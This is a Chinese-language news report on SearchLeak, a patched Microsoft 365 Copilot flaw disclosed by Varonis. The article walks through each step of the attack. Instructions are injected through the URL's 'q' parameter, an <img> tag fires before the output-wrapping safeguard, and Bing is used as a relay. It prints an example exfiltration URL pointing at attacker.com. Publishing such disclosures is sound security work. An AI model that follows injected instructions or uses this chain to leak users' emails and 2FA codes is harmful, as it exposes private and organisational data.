Microsoft 365 Copilot 高危漏洞曝光：黑客可窃取用户双重验证码

上周二，微软修复了其 M365 Copilot AI 平台中一个被评定为最高危级别的安全漏洞。本周一，发现并向微软报告该漏洞的安全研究人员公开披露了他们的概念验证漏洞利用方式——攻击者可借此从 Copilot 可访问的邮件中提取双重验证码（2FA）及其他敏感数据。

微软和其他大语言模型服务商目前仍无法彻底阻止其产品响应恶意指令并泄露数据。根本原因在于：AI 机器人无法区分用户本人发出的指令，与潜藏在第三方内容中的恶意指令——而这些第三方内容正是模型在代表用户进行摘要、回复或执行其他操作时所处理的对象。由于这一关键边界无法从根本上得到保障，微软及同类厂商只能依靠构建复杂且临时性的防护机制，来尽量控制这一难以根治的"轻信"缺陷所带来的后果。

绕过防护机制

Copilot 和大多数大语言模型内置了一项防护措施，禁止其提交网页表单、发送电子邮件及执行其他可能导致数据外泄的类似操作。为绕过这一限制，针对大语言模型的攻击者转而利用标记语言——该语言可在无需 HTML 标签的情况下，为文本添加标题、列表、链接等格式元素。另一种绕过方式是将敏感数据包裹在 `<img>` 或 `<form>` 等 HTML 标签中。无论采用哪种方式，携带数据的网络请求最终都会抵达攻击者控制的服务器，并将机密信息记录在日志中。

微软的一项防护措施是将 Copilot 的输出内容封装在 `<code>` 代码块中，使浏览器将其作为纯文本处理；另一项措施则是限制 Copilot 在未获明确授权的情况下可访问的网站范围。尽管 Copilot 默认拥有向微软域名发送请求的权限，但对不受信任的外部站点的请求则受到严格限制。

安全公司 Varonis 设计出了一条能够突破上述防护机制的漏洞利用链，并将其命名为 SearchLeak。

第一个环节是研究人员所称的"参数到提示注入"（Parameter-to-Prompt Injection）。此处利用的参数是 URL 中的 `q` 字段，该字段通常用于标记所包含的查询内容。参数到提示注入与提示注入攻击高度相似，区别在于恶意指令位于查询参数中，而非存在于电子邮件或其他不受信任的内容里。

为实施参数到提示注入，攻击者向目标用户发送一封包含特定 URL 的邮件，格式为：`https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=`，该 URL 中嵌入了具体的攻击指令，而 Copilot 会照单全收地执行。

研究人员在报告中写道："搜索功能正是攻击者所需要的，因为即便能力有限，只要目标用户能够访问关键信息，就已经足够。为了实现数据外泄，攻击者精心构造一个 URL，指示 Copilot '搜索用户邮件'，提取邮件标题，并将其嵌入图片 URL 中。"整个过程中，受害者无需主动输入任何内容——只需点击一个链接，Copilot 便会自动完成后续所有操作。

通常情况下，将输出内容封装在 `<code>` 块中的防护机制会在此时介入拦截。然而，研究人员发现该保护机制仅在"思考"阶段结束后才会触发。在此之前，Copilot 使用原始 HTML 生成响应内容，这些内容会被临时渲染到浏览器的 DOM 中。

研究人员对此描述如下：

整个攻击序列如下所示：

Copilot 开始流式输出响应，其中包含一个 `<img>` 标签；

浏览器识别到该 `<img>` 标签后立即渲染，并向 src 属性中的 URL 发起 HTTP 请求；

Copilot 完成内容生成，防护机制将所有内容封装进 `<code>` 块；

但为时已晚！请求早已发出。

至此，研究人员成功使图片请求从目标用户的浏览器中发出。然而，如前所述，Copilot 不会向大多数外部网站发送图片请求。为了突破这一限制，攻击链将微软必应（Bing）搜索引擎用作"跳板"。根据 Copilot 的内容安全策略，必应属于被允许发送此类请求的站点。必应随后会将请求转发至包含在请求中的攻击者控制域名，请求格式大致如下：

`https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png`

Varonis 的研究人员指出："由于 SearchLeak 针对的是微软企业版服务，其攻击影响范围不仅限于个人数据，还能获取用户在组织内部有权访问的一切内容，包括电子邮件、会议邀请与备注、SharePoint 文档、OneDrive 文件以及其他已建立索引的业务内容。根据 M365 与组织环境的连接方式，攻击影响范围甚至可能进一步扩大。"

如前所述，微软已于上周二修复了 SearchLeak 所利用的相关漏洞。然而，由于此类安全缺陷的根本成因目前仍无有效解决方案，攻击者势必会持续寻找新的方式绕过新构建的防护机制，这一攻防博弈的循环也将周而复始地上演。

Q&A

Q1：SearchLeak 攻击是如何从用户邮件中窃取双重验证码的？

A：SearchLeak 利用 M365 Copilot 的搜索功能，通过"参数到提示注入"方式，将恶意指令嵌入 URL 的查询参数中发送给受害者。用户点击链接后，Copilot 自动搜索邮件并提取敏感内容，再通过 `<img>` 标签将数据拼接进图片 URL，趁防护机制尚未触发前将请求发出。最终借助必应搜索引擎作为跳板，将包含双重验证码等敏感信息的请求转发至攻击者控制的服务器。

Q2：微软 Copilot 的防护机制为何无法彻底阻止此类攻击？

A：Copilot 的核心缺陷在于大语言模型本身无法区分来自用户的合法指令与藏匿在第三方内容中的恶意指令。即便微软设置了"将输出封装在代码块中"或"限制可访问站点"等防护措施，攻击者仍可利用防护机制的触发时机差、必应等白名单域名可被用作跳板等漏洞加以绕过。由于根本成因无法修复，新的绕过方式将持续涌现。

Q3：SearchLeak 漏洞会影响哪些数据？普通用户会受到波及吗？

A：SearchLeak 主要针对微软 M365 企业版用户，可访问的数据范围极广，包括电子邮件、会议邀请与备注、SharePoint 文档、OneDrive 文件及其他业务内容。由于攻击利用的是用户自身的访问权限，只要用户有权访问相关数据，攻击者便可借助 Copilot 将其全部窃取。目前微软已于上周二完成修复，但根本性安全隐患依然存在。